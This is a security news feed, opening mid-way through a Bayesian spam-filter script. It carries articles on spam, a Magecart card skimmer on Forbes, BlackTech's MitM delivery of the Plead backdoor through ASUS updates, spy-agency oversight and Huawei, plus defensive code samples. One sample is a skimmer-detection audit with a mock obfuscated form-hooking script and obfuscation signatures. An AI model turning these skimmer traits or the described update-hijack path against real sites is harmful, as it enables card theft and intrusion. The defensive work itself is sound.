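    def spam_probability(self, text: str) -> float:
        """P(spam | tokens) with Laplace smoothing, computed in log space."""
        if self.n_spam == 0 or self.n_ham == 0:
            return 0.5                    # nothing to compare against yet
        vocab = len(set(self.spam) | set(self.ham))
        total_s = sum(self.spam.values())
        total_h = sum(self.ham.values())
        n = self.n_spam + self.n_ham
        log_s = math.log(self.n_spam / n)
        log_h = math.log(self.n_ham / n)
        for t in tokens(text):
            log_s += math.log((self.spam[t] + 1) / (total_s + vocab))
            log_h += math.log((self.ham[t] + 1) / (total_h + vocab))
        m = max(log_s, log_h)             # rescale to avoid underflow
        p_s, p_h = math.exp(log_s - m), math.exp(log_h - m)
        return p_s / (p_s + p_h)

    def is_spam(self, text: str, threshold: float = 0.9) -> bool:
        return self.spam_probability(text) >= threshold


def build_filter() -> BayesFilter:
    """Constructed starting corpus, standing in for the client's shipped model."""
    f = BayesFilter()
    for msg in ["win a free iphone click here now",
                "cheap meds online buy now free shipping",
                "you have won a lottery prize claim now"]:
        f.train(msg, True)
    for msg in ["lunch tomorrow at noon with the team",
                "please review the attached quarterly report",
                "meeting moved to thursday see calendar"]:
        f.train(msg, False)
    return f


def scenario() -> Dict[str, float]:
    """Walk through the feedback loop and return P(spam) at each step."""
    f = build_filter()
    leaked = "urgent wire transfer needed today please confirm account details"
    similar = "urgent wire transfer please confirm today"
    out = {"similar_before": f.spam_probability(similar)}
    f.report_spam(leaked)                 # user clicks "Report spam" on the leak
    out["similar_after"] = f.spam_probability(similar)
    ham = "free lunch tomorrow for the team"
    out["ham_before"] = f.spam_probability(ham)
    f.report_not_spam(ham)                # user rescues a false positive
    out["ham_after"] = f.spam_probability(ham)
    return out


if __name__ == "__main__":
    for step, p in scenario().items():
        print(f"{step:15s} P(spam) = {p:.3f}")
```

Before the report, the wire-transfer message looks like ordinary mail to this filter because none of its words have ever appeared in spam; one click moves a near-identical follow-up above the 0.9 threshold. The “Not spam” click works the same way in reverse, which is why both buttons matter and why deleting spam silently teaches the filter nothing.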

Train yourself not to respond to spam

This is the most important of all the email spam blocker tips, because security always starts with the individual user. Train yourself never to respond to spam. Spam emails will land in your inbox almost daily, and many of them look genuine, so learn to recognize them and resist responding. If an email seems even slightly suspicious, do not click its link or open its attachment; confirm the email is genuine first. Likewise, when you receive spam from an address you know, contact that person and tell them, since they may not be aware their account is sending it. This helps stop the spread of spam.

Learn to protect and, if needed, hide your email address

You must learn to protect your email address from spam. There are some very important things you need to do for this. It’s best to have one or more alternative email addresses, which you could use for things like hotel bookings, online shopping, etc. This way, your primary email address is spared the unwanted spam that follows online purchases, reservations or any other web activity that might add you to a spam distribution list.

Another thing you can do to protect your email address is to hide it as much as possible. Never publish your primary email address on the web unless you absolutely have to. Where you do have to publish an email address, publish a secondary one if that is acceptable, and publish your primary email address only when you have no other choice.

Use third-party antispam filters

It’s always best to use third-party antispam filters or extensions that can help nab the spam emails that sneak past your default email spam filter. Such third-party filters work by identifying spam as messages travel between the email server and the email client. There are different options, free as well as paid, depending on the kind of device you are using and on the extent of your filtering requirements.

Learn to unsubscribe from things that you don’t need

There are certain things that arrive periodically, like newsletters, which you might not actually need. It is advisable to unsubscribe from such services if you don’t need them at all. Yes, make it a point to unsubscribe from anything you don’t need in your inbox. Such emails carry links that let you unsubscribe from the service or stop receiving emails from that source. This step can curb, to a great extent, the spam that tends to accompany such emails and newsletters.

Change email address, if needed

You must be ready to change your primary email address if needed. When you have accidentally responded to spam and your email address is compromised beyond repair, when your email address has been revealed in too many places and is likely to be targeted by spam, or when your inbox is flooded with spam despite the security measures you have taken (because of security flaws or other such issues), it’s best to change your primary email address at the earliest opportunity. This, we agree, is a drastic step, but if such a drastic step has to be taken, just go for it. Security, after all, is of utmost importance.



The post The Six Most Effective Email Spam Blocker Tips appeared first on .

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back: this time the hackers injected a skimmer script into the Forbes magazine subscription website.

The malicious traffic was spotted on Wednesday by the security expert Troy Mursch, Chief Research Officer of Bad Packets.


Magecart hackers installed a malicious JavaScript skimmer to siphon payment card data entered into the site by subscribers. The crooks injected obfuscated JavaScript into the HTML code of the payment section; the decoded script is here.
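A defender-side check for the kind of injection described above, added here as an example and not taken from the article or from Bad Packets’ analysis: it parses a checkout page’s HTML, flags inline scripts that combine common obfuscation markers with a form-capture hook, and flags external scripts loaded from hosts outside an allowlist. The HTML sample, host names and allowlist are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page: one first-party script, one injected inline blob
# of the kind described in the article, one script from an unknown third-party host.
SAMPLE_HTML = r"""<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script>
var _0x3f=["\x63\x61\x72\x64\x6e\x75\x6d\x62\x65\x72","\x63\x76\x76"];
document.getElementById("payment").addEventListener("submit",function(){
  var k=String.fromCharCode(99,118,118);
});
</script>
<script src="https://stats.unknown-host.test/tag.js"></script>
</body></html>"""

# Assumed allowlist of hosts the shop legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
DECODER_CALLS = ("String.fromCharCode", "eval(", "atob(", "unescape(")
FORM_HOOKS = ("addEventListener", "onsubmit", ".value", "FormData")


class ScriptCollector(HTMLParser):
    """Collects every <script> element with its src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # HTMLParser hands <script> contents over unparsed, so this is the raw JS.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def obfuscation_indicators(body):
    """Return the markers that make an inline script look like an injected skimmer."""
    reasons = []
    if len(HEX_ESCAPE.findall(body)) >= 8:
        reasons.append("many \\x hex escapes")
    decoders = [c for c in DECODER_CALLS if c in body]
    if decoders:
        reasons.append("decoder calls: " + ", ".join(decoders))
    if any(h in body for h in FORM_HOOKS) and ("submit" in body or "click" in body):
        reasons.append("hooks a form submission")
    # Require at least two markers: legitimately minified code often shows one.
    return reasons if len(reasons) >= 2 else []


def audit_scripts(html, allowed_hosts):
    """Flag external scripts off the allowlist and inline scripts with skimmer markers."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if host not in allowed_hosts:
                findings.append({"kind": "external", "detail": s["src"]})
        else:
            reasons = obfuscation_indicators(s["body"])
            if reasons:
                findings.append({"kind": "inline", "detail": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS):
        print(finding["kind"], "->", finding["detail"])
```

Run against a saved copy of a live payment page, the same audit is a cheap periodic integrity check; a Content-Security-Policy that only permits the allowlisted hosts is the preventive counterpart.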

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that it is investigating the incident and that at this stage it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activity.

Forbes was likely the victim of a supply chain attack: the Magecart hackers compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published by RiskIQ.

Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.

Security firms have monitored the activities of at least a dozen Magecart groups since 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they differ considerably from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

Rights Group Win Allows Courts to Scrutinize Spy Agencies


Privacy campaigners are hailing a major legal victory after the Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Trump Declares National Emergency to Contain China Threat


The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on an “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted or not, this could put the firm in a serious position similar to ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firm broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity Specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Why ISO 27005 risk management is the key to achieving ISO 27001 certification

If you’re familiar with ISO 27001, you’ll know that it’s the international standard for information security and contains the certification requirements that are expanded upon throughout the ISO 27000 series.

There are 46 standards in total in the series (although only a few apply to every organisation), of which ISO 27005, the risk management standard, is arguably the most important and easiest to get wrong.

What is risk management?

Risk management is the process of analysing how an organisation will be affected by a disruptive incident and what the consequences might be. This includes any scenario in which the confidentiality, integrity and availability of data is compromised.

Assessing these risks helps inform your decision about the best way to reduce them to an acceptable level.

Getting this process right is essential, because your entire ISMS (information security management system) is shaped around your response to risks. You need an accurate estimation of how risks will play out in order to prioritise the biggest threats and adopt the appropriate controls.

What does ISO 27005 say?

As with every standard in the ISO 27000 series, ISO 27005 doesn’t prescribe a specific approach to risk management. This is because organisations have their own challenges and must tackle them in a way that suits them.

This is markedly different from other popular risk management standards such as OCTAVE and NIST SP 800-30, which adopt a one-size-fits-all approach and are perceived to restrict business efficiency and productivity.

That’s not to say organisations have to figure everything out themselves. ISO 27005 provides a detailed but flexible structure to meet its requirements, comprising five stages.

1. Identification

  • Identify assets: First, you need to locate every piece of information you hold and determine whether it is a ‘primary’ or ‘supporting’ asset. Primary assets are information or business processes, and supporting assets are related IT systems, infrastructure and people resources. Organisations are required to identify primary assets, and supporting assets that could have an impact on the primary asset, typically giving details about asset ownership, location and function.
  • Identify threats: Threats are many and varied, and should be continuously monitored to take into account new and emerging threats.
  • Identify vulnerabilities: Your organisation will have weaknesses in its technology, people (human error, malicious action, social engineering, etc.) and processes, all of which need to be identified.
  • Identify existing controls: Unlike other risk assessment methodologies, an ISO 27005 risk assessment requires an organisation to identify all of its existing controls and to take into account the protection provided by these controls before applying any new ones.

2. Assessment

ISO 27005 encourages organisations to focus their response efforts on the biggest threats, so you should use the information you’ve gathered about your assets, vulnerabilities and threats to prioritise the biggest risks.

There are many ways to do this, but the most common approach involves the following equation:

Risk = (the probability of a threat exploiting a vulnerability) x (total impact of the vulnerability being exploited)


3. Treatment

Now that you know the level of risk that each threat poses, you need to decide how you’ll treat them. There are four options:

  • Modify the risk by implementing a control to reduce the likelihood of it occurring. For example, you might address the risk of a work-issued laptop being stolen by creating a policy that instructs employees to keep devices with them and to store them safely.
  • Avoid the risk by ceasing any activity that creates it. This response is appropriate if the risk is too big to manage with a security control. For example, if you’re not willing to take any chances of a laptop being stolen, you might choose to ban employees from using them off-site. This option will make things less convenient for your employees but will drastically improve your security posture.
  • Share the risk with a third party. There are two ways you can do this: by outsourcing the security efforts to another organisation or by purchasing cyber insurance to ensure you have the funds to respond appropriately in the event of a disaster. Neither option is ideal, because you are ultimately responsible for your organisation’s security, but they might be the best solutions if you lack the resources to tackle the risk.
  • Retain the risk. This means that your organisation accepts the risk and believes that the cost of treating it is greater than the damage that it would cause.

The method you choose depends on your circumstances. Avoiding the risk is the most effective way of preventing a security incident, but doing so will probably be expensive if not impossible. For example, many risks are introduced into an organisation by human error, and you won’t often be able to remove the human element from the equation.

You’ll therefore be required to modify most risks. This involves selecting the relevant information security controls, which are outlined in Annex A of ISO 27001 and explained further in ISO 27002.

4. Communication

You need to keep a record of how you are tackling the risk and inform anyone who might be affected.

For example, if you’ve modified the risk of certain sensitive documents being misappropriated by applying access controls to them, you should tell your employees. This ensures that, should a staff member be denied access when they have a legitimate need to view the information, they know what the issue is and what action to take.

Likewise, if you’re avoiding a risk by no longer doing whatever it is that caused the problem, you also need to pass on the message to your staff.

5. Review

Risk management (and ISO 27001 compliance generally) is an ongoing process, so you need to regularly monitor your management plan. This serves two purposes. First, it enables you to check whether the treatment options you selected are working as intended. You might find that a control you implemented isn’t addressing the risk as well as you’d hoped or that it’s simply not appropriate. Likewise, you might have chosen to avoid certain risks but found that they are still present.

Second, it enables you to assess the changing threat landscape. New risks will have emerged and existing ones might have transformed, forcing you to reassess your priorities and your approach to risk management.

Learn how to deliver effective ISO 27005 risk management

Our ISO 27005 Certified ISMS Risk Management training course is the ideal starting point for anyone who wants to know more about how to deal with information security threats.

This three-day course develops your understanding of the key areas of information risk management, and is based on recognised best practice and real-world examples.


A version of this blog was originally published on 8 May 2017.

The post Why ISO 27005 risk management is the key to achieving ISO 27001 certification appeared first on IT Governance Blog.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET on July 2018, when it was abusing code-signing certificates stolen from D-Link for the distribution of the Plead backdoor that has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researchers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe, which belongs to the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe’, and discovered that the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames during the software update process.

Threat actors might have had access to the update mechanism, a circumstance that suggests two attack scenarios:

  • Hackers compromised the supply chain for the ASUS WebStorage cloud service;
  • Hackers were in a position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process.

Experts believe that the second scenario is more plausible: updates for the ASUS WebStorage software are not delivered over a secure connection, and the process does not validate the downloaded binaries.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.

Plead backdoor

In the ASUS WebStorage update mechanism, the client sends a request to the server asking for an update; the server responds in XML format, with a guid and a link included in the response. The software then checks, based on the information in the guid element, whether the installed version is older, and if so requests the update binary via the provided link.

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. Attackers inserted a new URL, which points to a malicious file at a compromised domain,” says ESET.

The attackers serve a Plead sample that acts as a first-stage downloader and fetches a fav.ico file from a server whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image followed by data used by the malware, located right after the PNG data.

The second-stage loader writes itself to the Start Menu startup folder to gain persistence. The loader then executes shellcode in memory to load the third-stage DLL, TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes. “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks.”
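To make ESET’s closing point concrete, here is an added Python example (not ESET’s or ASUS’s code) that contrasts the update flow the article describes with a hardened one: the hardened client insists on an HTTPS link to a pinned host and refuses to execute a binary whose SHA-256 does not match the manifest, so a swapped download is rejected rather than run. The element names guid and link follow the article; the sha256 element, the vendor host name, the binaries and the simulated downloads are constructed, and the stand-in fetch does not model the TLS certificate validation that the manifest’s integrity ultimately rests on.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed payloads: what the vendor meant to ship, and what a network
# position between client and server could substitute for it.
GOOD_BINARY = b"constructed sample: legitimate update payload"
SWAPPED_BINARY = b"constructed sample: substituted payload"
GOOD_DIGEST = hashlib.sha256(GOOD_BINARY).hexdigest()

# Weak manifest, as described in the article: plain-HTTP link and nothing that
# binds the delivered binary to the manifest.
WEAK_RESPONSE = """<?xml version="1.0"?>
<update>
  <guid>1.1.2.0</guid>
  <link>http://update.example-vendor.test/update.exe</link>
</update>"""

# Hardened manifest (assumed format): HTTPS link on a pinned host plus the
# SHA-256 of the binary it refers to.
HARDENED_RESPONSE = f"""<?xml version="1.0"?>
<update>
  <guid>1.1.2.0</guid>
  <link>https://update.example-vendor.test/update.exe</link>
  <sha256>{GOOD_DIGEST}</sha256>
</update>"""

PINNED_HOSTS = {"update.example-vendor.test"}  # assumed pinned download host


class UpdateRejected(Exception):
    """Raised when the hardened client refuses to install an update."""


def fetch(url, served):
    """Stand-in for the download: `served` maps URL -> bytes the network returns."""
    return served[url]


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def weak_update(installed, response, served):
    """Mirrors the flow the article describes: trust the link, run whatever arrives."""
    root = ET.fromstring(response)
    if version_tuple(root.findtext("guid")) <= version_tuple(installed):
        return None  # already up to date
    return fetch(root.findtext("link"), served)  # no scheme check, no authenticity check


def hardened_update(installed, response, served):
    """Only returns a binary that came from a pinned HTTPS host and matches the manifest."""
    root = ET.fromstring(response)
    guid, link, digest = root.findtext("guid"), root.findtext("link"), root.findtext("sha256")
    if version_tuple(guid) <= version_tuple(installed):
        return None
    parsed = urlparse(link)
    if parsed.scheme != "https" or parsed.hostname not in PINNED_HOSTS:
        raise UpdateRejected(f"untrusted download location: {link}")
    if not digest:
        raise UpdateRejected("manifest carries no digest for the binary")
    data = fetch(link, served)
    if not hmac.compare_digest(hashlib.sha256(data).hexdigest(), digest):
        raise UpdateRejected("downloaded binary does not match manifest digest")
    return data


def rejects(update_fn, *args):
    """True if the client refuses the update; used to exercise the failure paths."""
    try:
        update_fn(*args)
    except UpdateRejected:
        return True
    return False


if __name__ == "__main__":
    served = {
        "http://update.example-vendor.test/update.exe": SWAPPED_BINARY,
        "https://update.example-vendor.test/update.exe": GOOD_BINARY,
    }
    print("weak client installs swapped binary:", weak_update("1.1.1.0", WEAK_RESPONSE, served) == SWAPPED_BINARY)
    print("hardened client rejects weak manifest:", rejects(hardened_update, "1.1.1.0", WEAK_RESPONSE, served))
    print("hardened client accepts genuine update:", hardened_update("1.1.1.0", HARDENED_RESPONSE, served) == GOOD_BINARY)
```

A vendor-signed manifest, verified against a public key embedded in the client, would remove even the dependence on the TLS fetch; the digest check shown here is the minimum that stops an intercepted download from executing.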

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

Identity theft victims could lead us to accept more security-improving friction

Far too many individuals who have never been victims of identity theft and financial crimes don’t understand how devastating those are to victims. “There are many victim services organizations that assist violent crime victims and the understanding of the trauma and the victim experience is not questioned (which is very appropriate and as it should be),” Eva Velasquez, president and CEO of the Identity Theft Resource Center (ITRC), told Help Net Security. After all, we … More

The post Identity theft victims could lead us to accept more security-improving friction appeared first on Help Net Security.

CISOs: What would you do over?

Just after the new year I was catching up with a CISO over lunch in Pike Place Market in Seattle. We were reminiscing about how tough it is to get a security program up and running in the beginning. Pausing to dip his taco in the excellent house salsa, he commented, “Y’know, if I had to do it all over again…” and he proceeded to tell me a story. My brain twitched with possibilities—here was … More

The post CISOs: What would you do over? appeared first on Help Net Security.

Fundamental Need For A Productive ITSM (IT Service Management)

It is true that many business departments have introduced cloud services that deliver advanced IT without involving the information systems department. But the information systems department itself has to change too. It must move away from the old concept of merely managing IT systems and shift its mission to that of a business partner that provides useful IT services to all users in the company as its customers. IT service management holds the key: it standardizes, visualizes and automates business processes that until now have depended on personal or ad hoc judgment, improves the quality of IT services, and eliminates unnecessary work, streamlining the organization’s operations.

So how can we introduce and practice proper IT service management? If your company has no experience or knowledge in this area, you will not know where to start or what to do. A useful approach in such a situation is to learn from and reference the best practices of the world’s leading companies. As a guideline, a framework called the Information Technology Infrastructure Library (ITIL) is well known. Seen from a different point of view, applying the concept of IT service management based on ITIL to all business divisions will enable the information systems division to regain its leadership. This is a great opportunity.

In recent years, companies in every sector have been accelerating their transformation; the manufacturing industry, for example, which has traditionally focused on manufacturing alone, is accelerating its conversion to a service model. To stay competitive in this wave of digital transformation, it must be possible to launch strategic IT services quickly even when the future cannot be foreseen, and to improve operations and correct course in response to environmental changes. In some cases, flexible measures never taken before will be necessary, such as linking with other companies’ services and promoting co-creation without hesitation. As a supporting partner to business departments and managers, the information systems department faces unprecedented expectations. The first step of an ITIL introduction is the service desk.

In the previous version, V2, ITIL centered on two major guidelines:

  • Service support that describes daily operation methods
  • Service delivery that describes medium- and long-term service management methods.

In the latest version, V3, while following these two ideas, the classification is based on five core principles:

  1. Service strategy
  2. Service design
  3. Service transition
  4. Service operation
  5. Continuous service improvement.

Each describes the ideal state of one process in the IT service lifecycle; among these, the key processes are:

  • Service Desk
  • Incident Management
  • Problem Management
  • Change Management
  • Release Management
  • Configuration Management
  • Service Level Management
  • IT Service Financial Management
  • Capacity Management
  • IT Service Continuity Management
  • Availability Management

The above-mentioned parts of ITSM are important concepts for a well-oiled IT organization in a business of any size. The starting point for these processes is the service desk. Among Fortune 500 companies, ITIL began to spread in the early 2000s, and more than half of them started with the service desk, because it has the fastest and most visible effect on improving the quality of IT services.

In fact, looking at the current state of service desks, it’s not uncommon to find workflows that rely on email or phone interaction. Users cannot even see the current status of their requests. Meanwhile, the manager or head of each department cannot grasp what is blocking the person in charge at the business site, and even when issues are prioritized, the information needed to judge them is not gathered. The recommended approach is to first introduce measures that improve the operational workflows of these inefficient service desks, and then to establish an IT service management workflow that is optimal for the entire company, while keeping in view systems operation management for the latest technology and user satisfaction.

All providers of ITSM services boast of their SLA levels and competitive pricing to potential customers. Companies need to do their homework: research the track records of the competing firms and check reviews from current clients to determine each provider’s capability. There are many considerations beyond the scope of this article, but one thing is common to all ITSM service providers: they are “for-profit” businesses that seek to earn as much profit as possible and to reduce their own costs as much as possible. A clear assessment of the pros and cons of the competing service providers should be carried out by a competent IT team within the organization.




The post Fundamental Need For A Productive ITSM (IT Service Management) appeared first on .

When all else fails, organizations realize they must share threat intel

A large majority of security IT decision makers are ready and willing to share valuable threat intelligence data to help the collective industry make better, more informed decisions when it comes to cyber attacks, an IronNet Cybersecurity report reveals. To compile the “Collective Offense Calls for a Collective Defense: A Reality Check for Cybersecurity Decision Makers” report, IronNet commissioned survey firm Vanson Bourne to interview 200 U.S. security IT decision makers across many industries including … More

The post When all else fails, organizations realize they must share threat intel appeared first on Help Net Security.

Personalized Scams

Cyber criminals now have a wealth of information on almost all of us. With so many organizations hacked nowadays, cyber criminals simply purchase databases with personal information on millions of people, then use that information to customize their attacks, making them far more realistic. Just because an urgent email has your home address, phone number or birth date in it does not mean it is legitimate.

CEOs and business leaders trust AI, but employees are more cautious

Most senior executives (85%) classify themselves as artificial intelligence (AI) optimists, citing increased investment and trust in the technology. Eighty-seven percent say their company will invest in AI initiatives this year, the EY study reveals. The data was collected via an online study conducted by Engine on behalf of EY among a sample of 500 US CEOs and business leaders ages 21 and older who work for a company with US$25m–US$50m in revenue or US$50m … More

The post CEOs and business leaders trust AI, but employees are more cautious appeared first on Help Net Security.

The six biggest cybersecurity risks facing the utilities industry

The utilities industry is rapidly modernizing its infrastructure, adding more digitized equipment and connectivity across devices, plants, and systems. This evolution to “smart infrastructure” represents a positive, paradigm shift for the industry. Unfortunately, the security policies of many utilities have not evolved along with it, leaving them incredibly vulnerable. Utilities are investing heavily to modernize infrastructure. In fact, ABI Research projects that the industry will spend US$14 billion a year between 2018 and 2023 — … More

The post The six biggest cybersecurity risks facing the utilities industry appeared first on Help Net Security.

Trend Micro unveils cloud-native security customized to the demand of DevOps

Trend Micro, a global leader in cybersecurity solutions, announced the availability of the industry’s most complete security from a single solution protecting across cloud and container workloads. This leadership has been achieved through newly launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack. From virtual servers and data centers to public and private cloud workloads, containers are increasingly used and demand protection. Leading … More

The post Trend Micro unveils cloud-native security customized to the demand of DevOps appeared first on Help Net Security.

LogRhythm launches a cloud-based version of its NextGen SIEM Platform

LogRhythm, the company powering the world’s most modern enterprise security operations centers (SOCs), announced that it has released a cloud-based version of its NextGen SIEM Platform: LogRhythm Cloud. LogRhythm’s NextGen SIEM Platform is already used by some of the world’s largest and best-known enterprises. Collecting and analyzing trillions of security events and threat indicators each week, LogRhythm enables precise detection and accelerated neutralization of sophisticated cyberthreats for SOCs across the globe. These benefits are driven … More

The post LogRhythm launches a cloud-based version of its NextGen SIEM Platform appeared first on Help Net Security.

Verint’s Luminar to boost security resilience through a proactive customer-centric defense approach

Verint Systems, a global provider of data mining software for cyber security and intelligence, announced that it has launched Luminar, a new Cyber Threat Intelligence software solution that boosts security resilience through a proactive customer-centric defense approach. Luminar was introduced at Verint’s Cyber Intelligence Annual User Forum, which took place in Italy, and is another addition to Verint’s wide Cyber Intelligence portfolio. Luminar aggregates data from surface, deep and dark web sites, social networks and … More

The post Verint’s Luminar to boost security resilience through a proactive customer-centric defense approach appeared first on Help Net Security.

Karamba’s autonomous security solution protects connected devices and systems against attacks

Karamba Security, a world-leading provider of embedded cybersecurity for the automotive industry, announced that its autonomous security solution is being used to protect connected devices and systems across a broad spectrum of vertical markets facing similar large-scale cybersecurity threats. Following successful deployments of Karamba’s embedded, self-protecting and auto-recovery software technology in the automotive industry — including more than 32 engagements with car manufacturers and tier-1 automotive suppliers — manufacturers in other vertical markets have sought … More

The post Karamba’s autonomous security solution protects connected devices and systems against attacks appeared first on Help Net Security.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form or another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]… Read More

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

A Simple Data Breach Guide (Interpreting GDPR)

Perhaps it’s too melodramatic to claim that the debate over how to define a data breach “rages on” because we haven’t seen bodies flying out of windows yet, but it is a serious question with genuine financial ramifications now that the General Data Protection Regulation (GDPR) and its accompanying fines for mishandling data have arrived […]… Read More

The post A Simple Data Breach Guide (Interpreting GDPR) appeared first on The State of Security.

Keysight Technologies unveils new integrated network analyzers

